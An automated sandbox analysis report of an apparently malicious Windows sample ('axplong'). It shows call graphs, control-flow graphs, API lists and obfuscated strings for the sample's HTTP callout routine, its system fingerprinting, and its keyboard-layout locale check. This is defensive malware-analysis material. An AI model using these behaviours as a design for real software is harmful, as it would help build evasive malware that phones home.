_xtime_get GetSystemTimePreciseAsFileTime 13004->13005 13004->13006 13005->13006 13006->12959 13008 1002b0e 13007->13008 13014 101b747 13008->13014 13010 1002b42 13011 1002b49 13010->13011 13020 1002b80 13010->13020 13011->12905 13013 1002b58 std::_Throw_future_error 13015 101b754 13014->13015 13019 101b773 Concurrency::details::_Reschedule_chore 13014->13019 13023 101ca7a 13015->13023 13017 101b764 13017->13019 13025 101b71e 13017->13025 13019->13010 13031 101b6fb 13020->13031 13022 1002bb2 shared_ptr 13022->13013 13024 101ca95 CreateThreadpoolWork 13023->13024 13024->13017 13026 101b727 Concurrency::details::_Reschedule_chore 13025->13026 13029 101cccf 13026->13029 13028 101b741 13028->13019 13030 101cce4 TpPostWork 13029->13030 13030->13028 13032 101b707 13031->13032 13033 101b717 13031->13033 13032->13033 13035 101c97b 13032->13035 13033->13022 13036 101c990 TpReleaseWork 13035->13036 13036->13033 13128 1016ab0 13129 1016ae0 13128->13129 13132 1014690 13129->13132 13131 1016b2c Sleep 13131->13129 13135 10146cb 13132->13135 13147 1014d50 shared_ptr 13132->13147 13133 1014e39 shared_ptr 13133->13131 13136 100bd30 5 API calls 13135->13136 13135->13147 13148 1014723 shared_ptr __dosmaperr 13136->13148 13137 1014ef5 shared_ptr 13138 1014fbe shared_ptr 13137->13138 13142 1016a86 13137->13142 13168 1007ce0 13138->13168 13140 1014fcd 13174 1008290 13140->13174 13143 1014690 16 API calls 13142->13143 13145 1016b2c Sleep 13143->13145 13144 10149dd 13146 100bd30 5 API calls 13144->13146 13144->13147 13145->13142 13150 1014a42 shared_ptr 13146->13150 13147->13133 13160 1006590 13147->13160 13148->13144 13149 1038959 4 API calls 13148->13149 13149->13144 13150->13147 13153 1014270 13150->13153 13152 1014fe6 shared_ptr 13152->13131 13154 10142b2 13153->13154 13156 1014526 13154->13156 13158 10142d8 shared_ptr 13154->13158 13155 10144f0 shared_ptr 13155->13147 13157 1013520 14 API calls 13156->13157 13157->13155 13158->13155 13178 1013520 13158->13178 13161 10065ef 13160->13161 13162 10021c0 4 API calls 13161->13162 13163 1006679 shared_ptr 13162->13163 13164 10021c0 4 API calls 13163->13164 13165 1006802 shared_ptr 13163->13165 13166 1006707 shared_ptr 13164->13166 13165->13137 13166->13165 13167 10021c0 4 API calls 13166->13167 13167->13166 13170 1007d46 shared_ptr __cftof 13168->13170 13169 1007e83 GetNativeSystemInfo 13171 1007e87 13169->13171 13170->13169 13170->13171 13173 1007e98 shared_ptr 13170->13173 13171->13173 13253 1038a61 13171->13253 13173->13140 13177 10082f5 shared_ptr __cftof 13174->13177 13175 1008313 13175->13152 13176 1008434 GetNativeSystemInfo 13176->13175 13177->13175 13177->13176 13179 1013a82 shared_ptr std::_Xinvalid_argument 13178->13179 13180 101355f shared_ptr 13178->13180 13179->13158 13180->13179 13185 10138c5 shared_ptr __dosmaperr 13180->13185 13189 100ac70 13180->13189 13181 1038959 4 API calls 13183 1013a5a 13181->13183 13183->13179 13184 1013e22 13183->13184 13187 1013b6d 13183->13187 13211 1012df0 13184->13211 13185->13179 13185->13181 13194 1011da0 13187->13194 13191 100adc0 __cftof 13189->13191 13190 100ade6 shared_ptr 13190->13185 13191->13190 13226 10054e0 13191->13226 13193 100af4e 13197 1011e3b shared_ptr __dosmaperr 13194->13197 13195 1011e48 13196 100e410 6 API calls 13195->13196 13198 1012906 shared_ptr std::_Xinvalid_argument 13196->13198 13197->13195 13197->13198 13199 1038959 4 API calls 13197->13199 13198->13179 13203 1012235 shared_ptr 13199->13203 13200 1036639 RtlAllocateHeap 13201 101264a 13200->13201 13201->13195 13202 10366c7 4 API calls 13201->13202 13204 101265b shared_ptr __dosmaperr 13202->13204 13203->13198 13203->13200 13204->13198 13205 1038959 4 API calls 13204->13205 13206 1012729 13205->13206 13206->13195 13206->13198 13207 10127a1 13206->13207 13208 100e410 6 API calls 13207->13208 13209 1012813 13208->13209 13209->13198 13210 1005dd0 2 API calls 13209->13210 13210->13198 13212 1012e95 __cftof 13211->13212 13213 10132c2 InternetCloseHandle InternetCloseHandle 13212->13213 13214 1013301 13213->13214 13215 100e410 6 API calls 13214->13215 13216 10133f3 shared_ptr 13215->13216 13218 100ac70 4 API calls 13216->13218 13221 10138c5 shared_ptr __dosmaperr 13216->13221 13223 10134ea shared_ptr std::_Xinvalid_argument 13216->13223 13217 1038959 4 API calls 13219 1013a5a 13217->13219 13218->13221 13220 1013e22 13219->13220 13219->13223 13224 1013b6d 13219->13224 13222 1012df0 12 API calls 13220->13222 13221->13217 13221->13223 13222->13223 13223->13179 13225 1011da0 12 API calls 13224->13225 13225->13223 13227 1005500 13226->13227 13229 1005600 13227->13229 13230 10021c0 13227->13230 13229->13193 13233 1002180 13230->13233 13234 1002196 13233->13234 13237 1038647 13234->13237 13240 1037436 13237->13240 13239 10021a4 13239->13227 13241 1037476 13240->13241 13242 103745e __cftof __dosmaperr 13240->13242 13241->13242 13243 103681a __fassign 4 API calls 13241->13243 13242->13239 13244 103748e 13243->13244 13246 10379f1 13244->13246 13248 1037a02 13246->13248 13247 1037a11 __cftof __dosmaperr 13247->13242 13248->13247 13249 1037c15 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13248->13249 13250 1037d63 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13248->13250 13251 1037f95 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13248->13251 13252 1037bef GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13248->13252 13249->13248 13250->13248 13251->13248 13252->13248 13254 10386b7 4 API calls 13253->13254 13255 1038a7f 13254->13255 13255->13173 13256 10186d0 13257 101872a __cftof 13256->13257 13263 1019ab0 13257->13263 13259 1018754 13261 101876c 13259->13261 13267 10042f0 13259->13267 13262 10187d9 std::_Throw_future_error 13264 1019ae5 13263->13264 13273 1002be0 13264->13273 13266 1019b16 13266->13259 13268 101bddf InitOnceExecuteOnce 13267->13268 13269 100430a 13268->13269 13270 1004311 13269->13270 13271 1036bcb 9 API calls 13269->13271 13270->13262 13272 1004324 13271->13272 13274 1002c1d 13273->13274 13275 101bddf InitOnceExecuteOnce 13274->13275 13277 1002c46 13275->13277 13276 1002c51 13276->13266 13277->13276 13279 1002c88 13277->13279 13282 101bdf7 13277->13282 13289 1002340 13279->13289 13283 101be03 std::_Throw_future_error 13282->13283 13284 101be73 13283->13284 13285 101be6a 13283->13285 13287 10029e0 10 API calls 13284->13287 13292 101bd7f 13285->13292 13288 101be6f 13287->13288 13288->13279 13310 101b4d6 13289->13310 13291 1002372 13293 101cb34 InitOnceExecuteOnce 13292->13293 13294 101bd97 13293->13294 13295 101bd9e 13294->13295 13298 1036bcb 13294->13298 13295->13288 13297 101bda7 13297->13288 13305 1036bd7 13298->13305 13299 1038a8f __fassign 4 API calls 13300 1036c06 13299->13300 13301 1036c23 13300->13301 13302 1036c15 13300->13302 13304 103689d 4 API calls 13301->13304 13303 1036c79 9 API calls 13302->13303 13306 1036c1f 13303->13306 13307 1036c3d 13304->13307 13305->13299 13306->13297 13308 1036c51 __freea 13307->13308 13309 1036c79 9 API calls 13307->13309 13308->13297 13309->13308 13312 101b4f1 std::_Throw_future_error 13310->13312 13311 1038a8f __fassign 4 API calls 13313 101b59f 13311->13313 13312->13311 13314 101b558 __fassign 13312->13314 13314->13291 13040 1036954 13041 1036962 13040->13041 13042 103696c 13040->13042 13043 103689d 4 API calls 13042->13043 13044 1036986 __freea 13043->13044 13054 101b7b9 13061 101b6b5 13054->13061 13056 101b806 13073 101b618 13056->13073 13057 101b7e1 Concurrency::details::_Reschedule_chore 13057->13056 13069 101cab1 13057->13069 13060 101b81e 13062 101b6c1 Concurrency::details::_Reschedule_chore 13061->13062 13063 101c5af GetSystemTimePreciseAsFileTime 13062->13063 13068 101b6f2 13062->13068 13064 101b6d6 13063->13064 13083 1002a10 13064->13083 13066 101b6dc __Mtx_unlock 13067 1002a10 10 API calls 13066->13067 13067->13068 13068->13057 13070 101cacf 13069->13070 13071 101cabf TpCallbackUnloadDllOnCompletion 13069->13071 13070->13056 13071->13070 13074 101b624 Concurrency::details::_Reschedule_chore 13073->13074 13075 101c5af GetSystemTimePreciseAsFileTime 13074->13075 13076 101b67e 13074->13076 13077 101b639 13075->13077 13076->13060 13078 1002a10 10 API calls 13077->13078 13079 101b63f __Mtx_unlock 13078->13079 13080 1002a10 10 API calls 13079->13080 13081 101b65c __Cnd_broadcast 13080->13081 13081->13076 13082 1002a10 10 API calls 13081->13082 13082->13076 13084 1002a1a 13083->13084 13085 1002a1c 13083->13085 13084->13066 13086 101c16d 10 API calls 13085->13086 13087 1002a22 ___std_exception_copy 13086->13087 13087->13066 13037 1036539 13038 10363d7 __fassign 2 API calls 13037->13038 13039 103654a 13038->13039

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 760 100bd30-100bd7c 761 100c171-100c196 call 1017f00 760->761 762 100bd82-100bd86 760->762 768 100c1c4-100c1dc 761->768 769 100c198-100c1a4 761->769 762->761 763 100bd8c-100bd90 762->763 763->761 765 100bd96-100be1f InternetOpenW InternetConnectA call 1017840 call 1005b00 763->765 793 100be21 765->793 794 100be23-100be3f HttpOpenRequestA 765->794 770 100c1e2-100c1ee 768->770 771 100c128-100c140 768->771 773 100c1a6-100c1b4 769->773 774 100c1ba-100c1c1 call 101d569 769->774 776 100c1f4-100c202 770->776 777 100c11e-100c125 call 101d569 770->777 778 100c213-100c22f call 101cef4 771->778 779 100c146-100c152 771->779 773->774 781 100c23f-100c244 call 1036b7a 773->781 774->768 776->781 784 100c204 776->784 777->771 785 100c158-100c166 779->785 786 100c209-100c210 call 101d569 779->786 784->777 785->781 792 100c16c 785->792 786->778 792->786 793->794 798 100be70-100bedf call 1017840 call 1005b00 call 1017840 call 1005b00 794->798 799 100be41-100be50 794->799 812 100bee1 798->812 813 100bee3-100bef9 HttpSendRequestA 798->813 801 100be52-100be60 799->801 802 100be66-100be6d call 101d569 799->802 801->802 802->798 812->813 814 100bf2a-100bf52 813->814 815 100befb-100bf0a 813->815 816 100bf83-100bfa4 InternetReadFile 814->816 817 100bf54-100bf63 814->817 818 100bf20-100bf27 call 101d569 815->818 819 100bf0c-100bf1a 815->819 822 100bfaa 816->822 820 100bf65-100bf73 817->820 821 100bf79-100bf80 call 101d569 817->821 818->814 819->818 820->821 821->816 826 100bfb0-100c060 call 1034160 822->826
                    APIs
                    • InternetOpenW.WININET(01058D18,00000000,00000000,00000000,00000000), ref: 0100BDBC
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0100BDE1
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0100BE2B
                    • HttpSendRequestA.WININET(?,00000000), ref: 0100BEEB
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0100BF9D
                    • InternetCloseHandle.WININET(?), ref: 0100C077
                    • InternetCloseHandle.WININET(?), ref: 0100C07F
                    • InternetCloseHandle.WININET(?), ref: 0100C087
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                    • String ID: 9wGTaHilQw==$9wGTaLGWQy9=$SbKm$StYMTE==$invalid stoi argument$stoi argument out of range
                    • API String ID: 688256393-230317815
                    • Opcode ID: 66440cfbfdccca3d77fe46035003880e52c2e0d3dd35706d46928d44424e9600
                    • Instruction ID: 721a6f1345c194c61f38b046b639b1619d0eeb1b376b9c2ddaaa1363db692f20
                    • Opcode Fuzzy Hash: 66440cfbfdccca3d77fe46035003880e52c2e0d3dd35706d46928d44424e9600
                    • Instruction Fuzzy Hash: 8FB1C0B1A001589BFB25CF28CD84BEEBBB9EF41304F504298EA48972C5D7759A80CF94
                    APIs
                      • Part of subcall function 01017840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0101792C
                      • Part of subcall function 01017840: __Cnd_destroy_in_situ.LIBCPMT ref: 01017938
                      • Part of subcall function 01017840: __Mtx_destroy_in_situ.LIBCPMT ref: 01017941
                      • Part of subcall function 0100BD30: InternetOpenW.WININET(01058D18,00000000,00000000,00000000,00000000), ref: 0100BDBC
                      • Part of subcall function 0100BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0100BDE1
                      • Part of subcall function 0100BD30: HttpOpenRequestA.WININET(?,00000000), ref: 0100BE2B
                    • std::_Xinvalid_argument.LIBCPMT ref: 01014E72
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                    • String ID: R2Z$ SBZ$ wNZ$246122658369$9LFZ$Gl==$LrTsKE==$NvB+$NvF+$WMNZ$WMxZ$Wb Z$XvPZ$a9P=$aRFZ$aSF2aA==$avBZ$bLTZ$bcBZ$e76b71$stoi argument out of range
                    • API String ID: 2414744145-383584070
                    • Opcode ID: 0473a49296d78cbed02c07c98d3ebaa8b387a1d98621e01d14479870deb9cc3b
                    • Instruction ID: f69b19ea7bf4d4f1a048d1efb10da924202c075187e14ba7893b58e4f50f9d57
                    • Opcode Fuzzy Hash: 0473a49296d78cbed02c07c98d3ebaa8b387a1d98621e01d14479870deb9cc3b
                    • Instruction Fuzzy Hash: 122326719002488BEB19DB28CD887DDBB76AF91304F5481DCD089AB2D9DB7A9F84CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 915 1005dd0-1005ece 921 1005ed0-1005edc 915->921 922 1005ef8-1005f05 call 101cef4 915->922 924 1005eee-1005ef5 call 101d569 921->924 925 1005ede-1005eec 921->925 924->922 925->924 927 1005f06-100608d call 1036b7a call 101e060 call 1017f00 * 5 RegOpenKeyExA 925->927 944 1006093-1006123 call 1034000 927->944 945 1006458-1006461 927->945 973 1006446-1006452 944->973 974 1006129-100612d 944->974 947 1006463-100646e 945->947 948 100648e-1006497 945->948 952 1006470-100647e 947->952 953 1006484-100648b call 101d569 947->953 949 10064c4-10064cd 948->949 950 1006499-10064a4 948->950 957 10064fa-1006503 949->957 958 10064cf-10064da 949->958 955 10064a6-10064b4 950->955 956 10064ba-10064c1 call 101d569 950->956 952->953 959 100657e-1006583 call 1036b7a 952->959 953->948 955->956 955->959 956->949 966 1006505-1006510 957->966 967 100652c-1006535 957->967 963 10064f0-10064f7 call 101d569 958->963 964 10064dc-10064ea 958->964 963->957 964->959 964->963 968 1006522-1006529 call 101d569 966->968 969 1006512-1006520 966->969 970 1006562-100657d call 101cef4 967->970 971 1006537-1006546 967->971 968->967 969->959 969->968 978 1006558-100655f call 101d569 971->978 979 1006548-1006556 971->979 973->945 980 1006440 974->980 981 1006133-1006167 RegEnumValueW 974->981 978->970 979->959 979->978 980->973 986 100642d-1006434 981->986 987 100616d-100618d 981->987 986->981 990 100643a 986->990 992 1006190-1006199 987->992 990->980 992->992 993 100619b-100622d call 1017c20 call 1018350 call 1017840 * 2 call 1005c40 992->993 993->986
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: 3ab784688ad618d4213c2e887cccbe76d47c627edcf055debd123eeaba5a7bd9
                    • Instruction ID: 63f36b9f5dedba294ce5db34150195d51e76c51e2513bcd473afa86c66906b0e
                    • Opcode Fuzzy Hash: 3ab784688ad618d4213c2e887cccbe76d47c627edcf055debd123eeaba5a7bd9
                    • Instruction Fuzzy Hash: 82E1CC71900218AFEB25DBA4CC8CBDEBBBAEB14300F5042D9E548A7291DB759BC4CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1003 1007ce0-1007d62 call 1034000 1007 1007d68-1007d90 call 1017840 call 1005b00 1003->1007 1008 100825e-100827b call 101cef4 1003->1008 1015 1007d92 1007->1015 1016 1007d94-1007db6 call 1017840 call 1005b00 1007->1016 1015->1016 1021 1007db8 1016->1021 1022 1007dba-1007dd3 1016->1022 1021->1022 1025 1007e04-1007e2f 1022->1025 1026 1007dd5-1007de4 1022->1026 1029 1007e60-1007e81 1025->1029 1030 1007e31-1007e40 1025->1030 1027 1007de6-1007df4 1026->1027 1028 1007dfa-1007e01 call 101d569 1026->1028 1027->1028 1031 100827c call 1036b7a 1027->1031 1028->1025 1035 1007e83-1007e85 GetNativeSystemInfo 1029->1035 1036 1007e87-1007e8c 1029->1036 1033 1007e42-1007e50 1030->1033 1034 1007e56-1007e5d call 101d569 1030->1034 1044 1008281-1008286 call 1036b7a 1031->1044 1033->1031 1033->1034 1034->1029 1040 1007e8d-1007e96 1035->1040 1036->1040 1042 1007eb4-1007eb7 1040->1042 1043 1007e98-1007e9f 1040->1043 1048 1007ebd-1007ec6 1042->1048 1049 10081ff-1008202 1042->1049 1046 1007ea5-1007eaf 1043->1046 1047 1008259 1043->1047 1051 1008254 1046->1051 1047->1008 1052 1007ec8-1007ed4 1048->1052 1053 1007ed9-1007edc 1048->1053 1049->1047 1054 1008204-100820d 1049->1054 1051->1047 1052->1051 1056 1007ee2-1007ee9 1053->1056 1057 10081dc-10081de 1053->1057 1058 1008234-1008237 1054->1058 1059 100820f-1008213 1054->1059 1062 1007fc9-10081c5 call 1017840 call 1005b00 call 1017840 call 1005b00 call 1005c40 call 1017840 call 1005b00 call 1005620 call 1017840 call 1005b00 call 1017840 call 1005b00 call 1005c40 call 1017840 call 1005b00 call 1005620 call 1017840 call 1005b00 call 1017840 call 1005b00 call 1005c40 call 1017840 call 1005b00 call 1005620 1056->1062 1063 1007eef-1007f4b call 1017840 call 1005b00 call 1017840 call 1005b00 call 1005c40 1056->1063 1060 10081e0-10081ea 1057->1060 1061 10081ec-10081ef 1057->1061 1066 1008245-1008251 1058->1066 1067 1008239-1008243 1058->1067 1064 1008215-100821a 1059->1064 1065 1008228-1008232 1059->1065 1060->1051 1061->1047 1069 10081f1-10081fd 1061->1069 1103 10081cb-10081d4 1062->1103 1088 1007f50-1007f57 1063->1088 1064->1065 1071 100821c-1008226 1064->1071 1065->1047 1066->1051 1067->1047 1069->1051 1071->1047 1090 1007f59 1088->1090 1091 1007f5b-1007f7b call 1038a61 1088->1091 1090->1091 1097 1007fb2-1007fb4 1091->1097 1098 1007f7d-1007f8c 1091->1098 1102 1007fba-1007fc4 1097->1102 1097->1103 1100 1007fa2-1007faf call 101d569 1098->1100 1101 1007f8e-1007f9c 1098->1101 1100->1097 1101->1044 1101->1100 1102->1103 1103->1049 1105 10081d6 1103->1105 1105->1057
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01007E83
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: K9pqLk==$K9pqMU==$K9prKk==
                    • API String ID: 1721193555-747669196
                    • Opcode ID: c30acca61b7f8021d5ccdf9c17d29d8f052f905a4e011bdba4ceadb9b352b393
                    • Instruction ID: 63e00c9fdc786001879745dd347b44e8bb192c52e739c714a15ff8efe6988b47
                    • Opcode Fuzzy Hash: c30acca61b7f8021d5ccdf9c17d29d8f052f905a4e011bdba4ceadb9b352b393
                    • Instruction Fuzzy Hash: 56D12870E006459BEB25BB28DC4A3DE7B71AB86320F9442CDD4C56B3C1DB795E818BD2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1141 1036de1-1036e16 GetFileType 1142 1036ece-1036ed1 1141->1142 1143 1036e1c-1036e27 1141->1143 1146 1036ed3-1036ed6 1142->1146 1147 1036efa-1036f22 1142->1147 1144 1036e49-1036e65 call 1034000 GetFileInformationByHandle 1143->1144 1145 1036e29-1036e3a call 1037157 1143->1145 1156 1036eeb-1036ef8 call 10373ed 1144->1156 1158 1036e6b-1036ead call 10370a9 call 1036f51 * 3 1144->1158 1161 1036e40-1036e47 1145->1161 1162 1036ee7-1036ee9 1145->1162 1146->1147 1152 1036ed8-1036eda 1146->1152 1148 1036f24-1036f37 1147->1148 1149 1036f3f-1036f41 1147->1149 1148->1149 1168 1036f39-1036f3c 1148->1168 1154 1036f42-1036f50 call 101cef4 1149->1154 1152->1156 1157 1036edc-1036ee1 call 1037423 1152->1157 1156->1162 1157->1162 1177 1036eb2-1036eca call 1037076 1158->1177 1161->1144 1162->1154 1168->1149 1177->1149 1180 1036ecc 1177->1180 1180->1162
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 01036E03
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 01036E5D
                    • __dosmaperr.LIBCMT ref: 01036EF2
                      • Part of subcall function 01037157: __dosmaperr.LIBCMT ref: 0103718C
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID:
                    • API String ID: 2531987475-0
                    • Opcode ID: 60b8527b9b1e89bd3c8a6dad29f3d9df9181e599e4305ffe076c029f28c28417
                    • Instruction ID: 42d44e8f4f0a6f58bff76c28a945dcd5bd22f8c7ad1875c74d6e9442e1fb7ba7
                    • Opcode Fuzzy Hash: 60b8527b9b1e89bd3c8a6dad29f3d9df9181e599e4305ffe076c029f28c28417
                    • Instruction Fuzzy Hash: 48413CB5901245AFDB24EFB5D8459AFBBFDEF89300B10442DE996D3610EB32E904CB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
